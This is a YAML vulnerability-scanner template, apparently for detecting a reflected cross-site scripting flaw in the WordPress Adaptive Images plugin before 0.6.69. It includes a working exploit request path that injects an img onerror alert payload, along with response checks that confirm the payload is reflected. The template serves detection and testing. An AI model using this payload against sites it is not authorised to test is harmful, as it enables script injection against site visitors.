product: WordPress
vName: WordPress Adaptive Images - Cross-Site Scripting
type: 跨站脚本
vID: [ ]
level: 3
vDesc: WordPress Adaptive Images < 0.6.69 is susceptible to cross-site scripting because the plugin does not sanitize and escape the REQUEST_URI before outputting it back in a page.
version: < 0.6.69
note: ''
search: { }
protocol: http
link: https://wpscan.com/vulnerability/eef137af-408c-481c-8493-afe6ee2105d0
fix:
  - 建议联系软件厂商进行处理。
model: ''
logic: and
exploit:
  - exp:
      method: get
      follow: false
      path: /wp-content/plugins/adaptive-images/adaptive-images-script.php/%3Cimg/src/onerror=alert(document.domain)%3E/?debug=true
    verify:
      logic: and
      check:
        - body:
            value:
              - <img/src/onerror=alert(document.domain)>
              - <td>Image</td>
            logic: and
        - header:
            value:
              - text/html
            logic: and
        - status: 200